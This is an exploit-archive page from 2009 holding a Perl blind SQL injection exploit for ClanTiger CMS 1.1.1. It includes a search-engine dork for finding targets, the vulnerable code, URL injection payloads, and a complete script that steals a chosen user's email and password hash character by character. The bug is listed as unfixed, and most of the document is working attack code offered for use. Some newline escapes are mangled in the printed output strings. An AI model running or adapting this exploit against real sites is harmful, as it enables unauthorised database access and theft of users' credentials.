[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : ClanTiger <= 1.1.1 (slug) Blind SQL Injection Exploit
# Published : 2009-04-17
# Author : YEnH4ckEr
# Previous Title : ClanTiger <= 1.1.1 (Auth Bypass) SQL Injection Vulnerability
# Next Title : e-cart.biz Shopping Cart Arbitrary File Upload Vulnerability
#!/usr/bin/perl
#***********************************************************************************************
#***********************************************************************************************
#** **
#** **
#** [] [] [] [][][][> [] [] [][ ][] [] [][]] [] [> [][][][> [][][][] **
#** || || || [] [][] [] [] [] [] [] [] [] [] [] [] **
# [> [][][][] [][][][> [] [] [] [] [] [][] [] [][] [][][][> [] [] **
#** [-----[]-----[][][][>--[]--[]-[]---[][][]--[]-[]--[]--------[]-----[][][][>--[][][][]---
#**==[> [] [] [] [][] [] [] [][][] [] [][] [] [] [] >>--
#** [----[[]]----[]--- ----[]-----[]---[]--[]-----[]--[]-------[] []---[]----------[]--[]---/
# [> [[[]]] [][][][> [][] [] [][[] [[]] [][] [][][] [] [> [][][][> <][] []
#** **
#** **
#** ??VIVA SPAIN!...??GANAREMOS EL MUNDIAL!...o.O **
#** ??PROUD TO BE SPANISH! **
#** **
#***********************************************************************************************
#***********************************************************************************************
#
#----------------------------------------------------------------------------------------------
#| (custompage.php) BLIND SQL INJECTION |
#|--------------------------------------------------------------------------------------------|
#| | CLAN TIGER CMS | |
#| CMS INFORMATION: ---------------- |
#| |
#|-->WEB: http://www.clantiger.com |
#|-->DOWNLOAD: http://www.clantiger.com/download-clan-cms |
#|-->DEMO: http://www.demo.clantiger.com/ |
#|-->CATEGORY: CMS / Portals |
#|-->DESCRIPTION: ClanTiger is a content management system specifically designed for gaiming |
#| clans... |
#| |
#| CMS VULNERABILITY: |
#| |
#|-->TESTED ON: firefox 2.0.0.20 and IE 7.0.5730 (Default) |
#|-->DORK: "Powered by ClanTiger" |
#|-->CATEGORY: BLIND SQL INJECTION/ PERL EXPLOIT |
#|-->AFFECT VERSION: LAST = 1.1.1 (1.1 too) |
#|-->Discovered Bug date: 2009-04-12 |
#|-->Reported Bug date: 2009-04-12 |
#|-->Fixed bug date: Not fixed |
#|-->Info patch (????): Not fixed |
#|-->Author: YEnH4ckEr |
#|-->mail: y3nh4ck3r[at]gmail[dot]com |
#|-->WEB/BLOG: N/A |
#|-->COMMENT: A mi novia Marijose...hermano,cu?±ada, padres (y amigos xD) por su apoyo. |
#----------------------------------------------------------------------------------------------
#
#-----------
#BUG FILE:
#-----------
#
#Path --> [HOME_PATH]/modules/custompages.php
#
#It contents:
#
# function main()
# {
#
# ...
#
# $page = new CustomPage();
# $page->slug = $_GET['slug'];
# $page->getBy(array('slug'));
#
# if(!$page->id)
# {
# throw new cccException('The page you are looking for is currently unavailable. You may need to STOP! Hammertime. If School Is Out, You should try reloading this page.','Page not found');
# }
#
# $tpl->define('title',$page->title);
# $tpl->define('content',$page->content); // we allow HTML here, no safeoutput
#
# $this->pageDetails->setTitle($page->title);
# $this->pageDetails->addKeyword($page->keywords);
# $this->pageDetails->setDescription($page->description);
#
# $this->content = $tpl->publish();
# $this->display();
# }
#
#------------
#CONDITIONS:
#------------
#
#**DB_PREFIX="" (Default)
#
# maybe: db, db_clan, ...
#
#**Exist a custompage
#
#**gpc_magic_quotes=off
#
#---------------------------------------
#PROOF OF CONCEPT (BLIND SQL INJECTION):
#---------------------------------------
#
#[HOME_PATH]/modules/custompages.php?slug=the_custom_page' [BLIND SQL INJECTION]
#
#---------
#EXAMPLE:
#---------
#
#[HOME_PATH]/modules/custompages.php?slug=the_custom_page'%20AND%20((SELECT%20length(username)%20from%20members%20WHERE%20id=1)=5)%20/*
#
#Result: admin's username has 5 characters (maybe = admin? :P)
#
#*******************************************************************
# ESPECIAL THANKS TO: Str0ke and every H4ck3r(all who do milw0rm)!
#*******************************************************************
#-------------------------------------------------------------------
#*******************************************************************
# GREETZ TO: JosS and all spanish Hack3Rs community!
#*******************************************************************
#
#-------------------EOF---------------------------------->>>ENJOY IT!
#
use LWP::UserAgent;
use HTML::TreeBuilder 2.96;
#Subroutines
sub lw
{
my $SO = $^O;
my $linux = "";
if (index(lc($SO),"win")!=-1){
$linux="0";
}else{
$linux="1";
}
if($linux){
system("clear");
}
else{
system("cls");
system ("title Clan Tiger CMS (module custompages.php) BLIND SQL Injection Exploit");
system ("color 02");
}
}
sub request {
my $cookie="CCC_LANG=en;"." CCC_UID=".$_[0]."; CCC_CODE=".$_[1].";";
my $userag = LWP::UserAgent->new;
$userag -> agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
my $request = HTTP::Request -> new(GET => $_[2]);
$request->header(cookie => $cookie);
my $outcode= $userag->request($request)->as_string;
return $outcode;
}
sub helper {
print "nt[**] Clan Tiger CMS - BLIND SQL Injection Exploitn";
print "t[??] USAGE MODE: [??]n";
print "t[**] perl $0 [HOST] [PATH] [uid] [code] [slug] [id] [DB_PREFIX]n";
print "t[**] [HOST]: Web attacked.n";
print "t[**] [PATH]: Home Path.n";
print "t[**] [uid]: The CCC_UID cookie.n";
print "t[**] [code]: The CCC_CODE cookie.n";
print "t[**] [slug]: Title custompage.n";
print "t[**] [id]: Exploiting id user. Default: 1 (**optional)n";
print "t[**] [DB_PREFIX]: Global var needed. Default: null (**optional)n";
print "t[**] Example: perl $0 www.example.es Clan-tiger-111 f717716... n";
print "t[**] ...2e1a50db06c0f2fe8804885ac2c01390 namecustompage 1 ""n";
}
sub mail{
$output=&request($_[0],$_[1],$_[2]);
my $root = HTML::TreeBuilder->new_from_content($output);
# source file
$email= $root->look_down('_tag','td','style','width: 70%');
print "t-----------------------------------------------------------------n";
print "tMail captured!.Getting password hash. Wait for a moment...n";
print "t-----------------------------------------------------------------n";
return $email -> as_text();
$root->delete();
}
sub password {
#Second password...
$j=1;
$i=48;
while(($j<=32) && ($i<=126)){
my $finalrequest=$_[4]."'+AND+ascii(substring((SELECT+password+FROM+".$_[0]."members+WHERE+id=".$_[1]."),".$j.",1))=".$i."+/*";
$output=&request($_[2],$_[3],$finalrequest);
if ( $output =~ (/<title>/.$custompage))
{
$pass=$pass.chr($i);
$j++;
$i=47;
}
if($i==57)
{
$i=96;
}
#new char
$i++;
}
#Error
if(($i>127) || ($j>32)){
if(!$pass){
print "t-----------------------------------------------------------------n";
print("tEXPLOIT FAILED!n");
print("tFatal error: Datas doesn't find!n");
print "t-----------------------------------------------------------------n";
exit(1);
}
}
return $pass;
}
#Main
&lw;
print "tt#########################################################nn";
print "tt#########################################################nn";
print "tt## Clan Tiger CMS - BLIND SQL Injection Exploit ##nn";
print "tt## ++Conditions: Need a register user,a custompage ##nn";
print "tt## and DB_PREFIX (default:null) ##nn";
print "tt## Author: Y3nh4ck3r ##nn";
print "tt## Contact:y3nh4ck3r[at]gmail[dot]com ##nn";
print "tt## Proud to be Spanish! ##nn";
print "tt#########################################################nn";
print "tt#########################################################nn";
#Init variables
my $host=$ARGV[0];
my $path=$ARGV[1];
my $uid=$ARGV[2];
my $code=$ARGV[3];
my $custompage=$ARGV[4];
#Build the uri
my $finalhost="http://".$host."/".$path."/index.php?module=custompages&slug=";
$finalhost=$finalhost.$custompage;
#Check all variables needed
$numArgs = $#ARGV + 1;
if($numArgs<=4)
{
&helper;
exit(1);
}
#Id-user is optional.Default:1
if(!$ARGV[5]){
$idhack="1";
}else{
$idhack=$ARGV[5];
}
if(!$ARGV[6]){
$db_prefix="";
}else{
$db_prefix=$ARGV[6];
}
#Testing
my $finalrequest = $finalhost;
$output=&request($uid,$code,$finalrequest);
if ( $output =~ /<div class="title">Access denied</div>/)
{
print "t-----------------------------------------------------------------n";
print "tYour credentials are not correct! This exploits need login.n";
print "tOptions: [your-id-user],[your-password] incorrect.n";
print "tExploit failed! No luck!n";
print "t-----------------------------------------------------------------n";
exit(1);
}
if ( $output =~ /<div class="title">Page not found</div>/)
{
print "t-----------------------------------------------------------------n";
print "tCustom page doesn't exist! Maybe no there on this server!n";
print "tOption: [slug-get-var] incorrect.n";
print "tExploit failed! No luck!n";
print "t-----------------------------------------------------------------n";
exit(1);
}
if ( $output =~ (/<title>/.$custompage))
{
print "t-----------------------------------------------------------------n";
print "tThis Web could be vulnerable!n";
print "tThe custompage exists!n";
print "tTesting Blind SQL Injection...n";
print "t-----------------------------------------------------------------n";
}else{
print "t-----------------------------------------------------------------n";
print "tCustompage doesn't exist!n";
print "tEXPLOIT FAILED!n";
print "t-----------------------------------------------------------------n";
exit(1);
}
#Test blind sql injection
my $finalrequest=$finalhost."'+AND+1=1+/*";
$output=&request($uid,$code,$finalrequest);
if ( $output =~ (/<title>/.$custompage))
{
print "t-----------------------------------------------------------------n";
print "tThis Web is really vulnerable!n";
print "tTested Blind SQL Injection.n";
print "tChecking id user and DB_PREFIX null...n";
print "t-----------------------------------------------------------------n";
}else{
print "t-----------------------------------------------------------------n";
print "tThis Web is not vulnerable (Maybe patched)!n";
print "tEXPLOIT FAILED!n";
print "t-----------------------------------------------------------------n";
exit(1);
}
#Test if user exists and DB_PREFIX
my $finalrequest=$finalhost."'+AND+(SELECT+COUNT(*)+from+".$db_prefix."members+WHERE+id=".$idhack.")+/*";
$output=&request($uid,$code,$finalrequest);
if ( $output =~ (/<title>/.$custompage))
{
print "t-----------------------------------------------------------------n";
print "tOK...The user exists and DB_PREFIX is '".$db_prefix."'!n";
print "tStarting exploit...n";
print "t-----------------------------------------------------------------n";
print "tWait several minutes...n";
print "t-----------------------------------------------------------------n";
}else{
print "t-----------------------------------------------------------------n";
print "tUser doesn't exists or DB_PREFIX not '".$db_prefix."'n";
print "tEXPLOIT FAILED!n";
print "t-----------------------------------------------------------------n";
exit(1); }
#OK, now we get the mail user from web
#i got it from blind sql but this method is faster and reduce time of injection
#First email...
my $hostmail="http://".$host."/".$path."/index.php?module=profiles&action=view&id=".$idhack;
$mail=&mail($uid,$code,$hostmail);
$passhash=&password($db_prefix,$idhack,$uid,$code,$finalhost);
print "ntt*************************************************n";
print "tt**** EXPLOIT EXECUTED (CREDENTIALS STEALER) ****n";
print "tt*************************************************nn";
print "ttUser-id:".$idhack."n";
print "ttUser-email:".$mail."n";
print "ttUser-password(hash):".$passhash."nn";
print "ntt----------------------FINISH!--------------------nn";
print "tt---------------Thanks to: y3hn4ck3r--------------nn";
print "tt------------------------EOF----------------------nn";
exit(1);
#Ok...all job done
# www.Syue.com [2009-04-17]